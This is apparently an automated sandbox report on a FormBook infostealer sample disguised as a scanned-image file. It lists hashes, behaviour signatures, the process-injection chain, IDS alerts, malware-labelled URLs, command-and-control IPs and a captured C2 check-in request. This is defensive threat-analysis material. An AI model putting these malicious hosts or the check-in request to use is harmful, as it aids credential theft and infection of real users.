Windows Analysis Report
Scanned-IMGS_from NomanGroup IDT.scr.exe

Overview

General Information

Sample name: Scanned-IMGS_from NomanGroup IDT.scr.exe
Analysis ID: 1590590
MD5: 17cbb82b7db7a77df6507dd32af10563
SHA1: 816fc79a0d8dc1ea493779e01f21f99c00a9229d
SHA256: 744a3efa374159a40ea07cf1c6a295f40fef90685421d20ceda619847dbe6165
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Scanned-IMGS_from NomanGroup IDT.scr.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe" MD5: 17CBB82B7DB7A77DF6507DD32AF10563)
    • svchost.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zalkpCfMwtnpQo.exe (PID: 4856 cmdline: "C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • verclsid.exe (PID: 7608 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)
          • zalkpCfMwtnpQo.exe (PID: 4944 cmdline: "C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine|base64offset|contains: 6j, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, ParentProcessId: 7520, ParentProcessName: Scanned-IMGS_from NomanGroup IDT.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ProcessId: 7540, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", CommandLine|base64offset|contains: 6j, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, ParentProcessId: 7520, ParentProcessName: Scanned-IMGS_from NomanGroup IDT.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe", ProcessId: 7540, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T10:24:28.619902+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49223 | 13.248.169.48 | 80 | TCP
2025-01-14T10:25:01.443609+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57343 | 206.119.82.172 | 80 | TCP
2025-01-14T10:25:14.747221+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57427 | 67.223.117.142 | 80 | TCP
2025-01-14T10:25:28.132064+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57512 | 162.0.215.244 | 80 | TCP
2025-01-14T10:25:41.405894+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57583 | 3.33.130.190 | 80 | TCP
2025-01-14T10:26:03.413361+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57603 | 38.47.233.52 | 80 | TCP
2025-01-14T10:26:16.567525+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57607 | 104.21.3.193 | 80 | TCP
2025-01-14T10:26:29.699619+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57611 | 3.33.130.190 | 80 | TCP
2025-01-14T10:26:43.767121+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57615 | 20.244.96.65 | 80 | TCP
2025-01-14T10:27:05.120371+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 57619 | 84.32.84.32 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T10:24:53.839685+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57319 | 206.119.82.172 | 80 | TCP
2025-01-14T10:24:56.387302+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57320 | 206.119.82.172 | 80 | TCP
2025-01-14T10:24:58.924134+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57327 | 206.119.82.172 | 80 | TCP
2025-01-14T10:25:07.096702+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57374 | 67.223.117.142 | 80 | TCP
2025-01-14T10:25:09.625077+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57395 | 67.223.117.142 | 80 | TCP
2025-01-14T10:25:12.197696+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57411 | 67.223.117.142 | 80 | TCP
2025-01-14T10:25:20.684968+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57463 | 162.0.215.244 | 80 | TCP
2025-01-14T10:25:23.176391+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57479 | 162.0.215.244 | 80 | TCP
2025-01-14T10:25:25.619691+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57496 | 162.0.215.244 | 80 | TCP
2025-01-14T10:25:33.752152+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57544 | 3.33.130.190 | 80 | TCP
2025-01-14T10:25:36.292105+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57557 | 3.33.130.190 | 80 | TCP
2025-01-14T10:25:38.843157+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57570 | 3.33.130.190 | 80 | TCP
2025-01-14T10:25:55.782922+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57600 | 38.47.233.52 | 80 | TCP
2025-01-14T10:25:58.319121+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57601 | 38.47.233.52 | 80 | TCP
2025-01-14T10:26:00.896051+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57602 | 38.47.233.52 | 80 | TCP
2025-01-14T10:26:08.910903+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57604 | 104.21.3.193 | 80 | TCP
2025-01-14T10:26:12.082025+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57605 | 104.21.3.193 | 80 | TCP
2025-01-14T10:26:14.006169+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57606 | 104.21.3.193 | 80 | TCP
2025-01-14T10:26:22.054349+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57608 | 3.33.130.190 | 80 | TCP
2025-01-14T10:26:24.615122+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57609 | 3.33.130.190 | 80 | TCP
2025-01-14T10:26:27.168370+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57610 | 3.33.130.190 | 80 | TCP
2025-01-14T10:26:36.262702+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57612 | 20.244.96.65 | 80 | TCP
2025-01-14T10:26:38.809818+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57613 | 20.244.96.65 | 80 | TCP
2025-01-14T10:26:41.356459+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57614 | 20.244.96.65 | 80 | TCP
2025-01-14T10:26:57.375175+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57616 | 84.32.84.32 | 80 | TCP
2025-01-14T10:26:59.898580+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57617 | 84.32.84.32 | 80 | TCP
2025-01-14T10:27:02.468302+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 57618 | 84.32.84.32 | 80 | TCP

AV Detection

Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, Avira: detected
Source: http://www.nexula.website/ro4w/, Avira URL Cloud: Label: malware
Source: http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso=, Avira URL Cloud: Label: malware
Source: http://www.7wkto5nk230724z.click/yysf/, Avira URL Cloud: Label: malware
Source: http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8, Avira URL Cloud: Label: malware
Source: http://www.wddb97.top/p75v/, Avira URL Cloud: Label: malware
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, Virustotal: Detection: 36%
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, ReversingLabs: Detection: 44%
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, Joe Sandbox ML: detected
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zalkpCfMwtnpQo.exe, 00000002.00000002.3547860890.000000000013E000.00000002.00000001.01000000.00000004.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3547855130.000000000013E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verclsid.pdbGCTL source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: verclsid.pdb source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe, Code function: 0_2_004C5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\verclsid.exe, Code function: 3_2_0303C650 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\verclsid.exe, Code function: 4x nop then xor eax, eax (3_2_03029DD0)
Source: C:\Windows\SysWOW64\verclsid.exe, Code function: 4x nop then mov ebx, 00000004h (3_2_04E004DF)

Networking

Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49223 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57319 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57374 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57343 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57411 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57463 -> 162.0.215.244:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57395 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57327 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57496 -> 162.0.215.244:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57512 -> 162.0.215.244:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57320 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57479 -> 162.0.215.244:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57544 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57557 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57570 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57583 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57600 -> 38.47.233.52:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57611 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57607 -> 104.21.3.193:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57619 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57601 -> 38.47.233.52:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57427 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57612 -> 20.244.96.65:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57615 -> 20.244.96.65:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57606 -> 104.21.3.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57604 -> 104.21.3.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57616 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57608 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57602 -> 38.47.233.52:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57618 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57614 -> 20.244.96.65:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57603 -> 38.47.233.52:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57617 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57613 -> 20.244.96.65:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57610 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57605 -> 104.21.3.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57609 -> 3.33.130.190:80
Source: global traffic, TCP traffic: 192.168.2.4:49221 -> 1.1.1.1:53
Source: global traffic, TCP traffic: 192.168.2.4:57314 -> 162.159.36.2:53
Source: Joe Sandbox View, IP Address: 206.119.82.172
Source: Joe Sandbox View, IP Address: 67.223.117.142
Source: Joe Sandbox View, IP Address: 162.0.215.244
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: VIMRO-AS15189US
Source: Joe Sandbox View, ASN Name: ACPCA
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 identical entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 identical entries)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries)
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_004CCE44
                Source: global traffic | HTTP traffic detected: GET /4qxi/?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M= HTTP/1.1 | Host: www.thesquare.world | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
